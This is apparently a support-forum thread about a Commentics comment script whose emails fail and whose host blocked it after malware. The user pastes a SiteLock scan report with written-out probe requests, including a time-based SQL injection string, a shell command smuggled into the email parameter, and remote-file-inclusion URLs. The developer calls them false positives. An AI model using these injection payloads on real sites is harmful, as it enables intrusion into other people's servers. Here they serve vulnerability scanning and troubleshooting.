[Gabe]

Hello Steven,

My Commentics site has been inactive for awhile, but today someone posted and I did not receive the admin notification.
When I found out about the post, I had to approve the post and send out the notifications. The emails are apparently not going out. I did several tests, first using gmail as the sender, then godaddy. Neither of them worked. I then changed from PHP basic to PHP swift. Neither of them would work.

Another possible consideration is that I cannot upgrade to your newest version because godaddy has PHP Version 5.4.45 which is not high enough.

I'm hoping to solve the email problem. Thanks

[Steven]

Hi Gabe, okay it may not be due to the transport method then. Try working your way through the other possibilities in this FAQ:

https://www.commentics.org/support/knowl...article=25

[Gabe]

I saw the following error, there are quite a few similar:

Error Log Backend:

[28-Dec-2016 17:37:55 America/New_York] PHP Fatal error:  Uncaught exception 'Swift_TransportException' with message 'Connection could not be established with host smtpout.secureserver.net [Connection refused #111]' in /home/gabe7/public_html/comments/includes/external/swift_mailer/lib/classes/Swift/Transport/StreamBuffer.php:259
Stack trace:

[Steven]

I see so this is because your SMTP relay server (smtpout.secureserver.net) is refusing the connection. There are a few reasons why this might happen. For example it could be that your host is blocking outgoing connections on whatever port you've entered in 'Settings -> Email -> Setup'. I'd check with your host to see if they've changed something (maybe they have an email setup tutorial that has new instructions). In any case it's really a server issue which they'd have to resolve.

[Gabe]

Steve,

There was malware on my website, and that seemed to be the reason that the email was blocked on the server. But after the malware was removed, it turns out that there is also a problem with the coding. So there is still a block. I copied and pasted the following from SiteLock:

High
CGI Generic SQL Injection (blind, time based)
Port: 80 Service: www
Exclude Finding

Synopsis: A CGI application hosted on the remote web server is potentially prone to SQL injection attack.

Description: By sending specially crafted parameters to one or more CGI scripts hosted on the remote web server, SiteLock was able to get a slower response, which suggests that it may have been able to modify the behavior of the application and directly access the underlying database.

An attacker may be able to exploit this issue to bypass authentication, read confidential data, modify the remote database, or even take control of the remote operating system.

Note that this script is experimental and may be prone to false positives.

Solution: Modify the affected CGI scripts so that they properly escape arguments.

Technical Details:

Using the GET HTTP method, SiteLock found that :

+ The following resources may be vulnerable to blind SQL injection (time based) :

+ The 'cmtx_remember' parameter of the /fleebabylon.php#cmtx_form CGI :

/fleebabylon.php#cmtx_form?recaptcha_response_field=manual_challenge&rec
aptcha_challenge_field=&cmtx_website=http%3a%2f%2f&cmtx_user_answer=&cmt
x_reply_id=0&cmtx_town=&cmtx_real_answer=e&cmtx_preview=Preview&cmtx_pre
v_def=&cmtx_notify=&cmtx_comment=&cmtx_country=&cmtx_email=&cmtx_honeypo
t=&cmtx_name=&cmtx_resubmit_key=xhl66voat9zutueyhnlr&cmtx_security_key=c
4l5uudjvjud47qb0sb2&cmtx_sub_def=&cmtx_submit=Add%20Comment&cmtx_time=14
83046767&cmtx_remember='));SELECT%20pg_sleep(3);--
-------- output --------

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

Synopsis: It may be possible to run arbitrary code on the remote web server.

Description: The remote web server hosts CGI scripts that fail to adequately sanitize request strings. By leveraging this issue, an attacker may be able to execute arbitrary commands on the remote host.

Note that this script uses a time-based detection method which is less reliable than the basic method.

Solution: Restrict access to the vulnerable application. Contact the vendor for a patch or upgrade.

Technical Details:

Using the GET HTTP method, SiteLock found that :

+ The following resources may be vulnerable to arbitrary command execution (time based) :

+ The 'cmtx_email' parameter of the /fleebabylon.php#cmtx_form CGI :

/fleebabylon.php#cmtx_form?recaptcha_response_field=manual_challenge&rec
aptcha_challenge_field=&cmtx_website=http%3a%2f%2f&cmtx_user_answer=&cmt
x_reply_id=0&cmtx_remember=&cmtx_real_answer=e&cmtx_preview=Preview&cmtx
_prev_def=&cmtx_notify=&cmtx_comment=&cmtx_country=&cmtx_town=&cmtx_hone
ypot=&cmtx_name=&cmtx_resubmit_key=xhl66voat9zutueyhnlr&cmtx_security_ke
y=c4l5uudjvjud47qb0sb2&cmtx_sub_def=&cmtx_submit=Add%20Comment&cmtx_time
=1483046767&cmtx_email=%20;%20x%20%7C%7C%20sleep%203%20%26

-------- output --------

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Synopsis: Arbitrary code may be run on the remote server.

Description: The remote web server hosts CGI scripts that fail to adequately sanitize request strings. By leveraging this issue, an attacker may be able to include a remote file from a remote server and execute arbitrary commands on the target host.

Solution: Restrict access to the vulnerable application. Contact the vendor for a patch or upgrade.

Technical Details:

Using the GET HTTP method, SiteLock found that :

+ The following resources may be vulnerable to web code injection :

+ The 'cmtx_video_dialog_field' parameter of the /fleebabylon.php CGI :

/fleebabylon.php?cmtx_video_dialog_field=http://a8c3aI3L.example.com/

-------- output --------
"to his own land"-- "to his own people" .... so where are you from [...]

[...] included, require speakers to prove their point by Yahweh's Word. And it is the commanded method for every belief. If there is no specific and clearly understandable Scripture saying a thing, then any decision, belief, is of one's own decision. If there is no plain, clear Scripture commanding to flee to the middle-east nation named Israel, then there is no command from Yahweh to do so. By fleeing to ... Read MoreOne good thing about attending at Assembly of Yahweh in Eaton Rapids, Michigan, is some, me includ [...]

The following are some of the prophesies concerning Babylon...
------------------------

+ The 'recaptcha_response_field' parameter of the /fleebabylon.php#cmtx_form CGI :

/fleebabylon.php#cmtx_form?recaptcha_response_field=http://a8c3aI3L.exam
ple.com/

-------- output --------
"to his own land"-- "to his own people" .... so where are you from [...]

[...] included, require speakers to prove their point by Yahweh's Word. And it is the commanded method for every belief. If there is no specific and clearly understandable Scripture saying a thing, then any decision, belief, is of one's own decision. If there is no plain, clear Scripture commanding to flee to the middle-east nation named Israel, then there is no command from Yahweh to do so. By fleeing to ... Read MoreOne good thing about attending at Assembly of Yahweh in Eaton Rapids, Michigan, is some, me includ [...]

The following are some of the prophesies concerning Babylon...

[Steven]

Hi Gabe, I've looked into this and they're all false positives. Every arbitrary input, including the ones mentioned, is properly escaped for the database. Performing a time-based test like they've done is prone to false positives because a page can load slower for countless reasons and not simply because they've changed one of the values in the request. A good host shouldn't block you by relying on these tests. They need to actually spend a minute or two to verify the outcomes, at which point I'm certain they'll release the block and consequently review their procedures.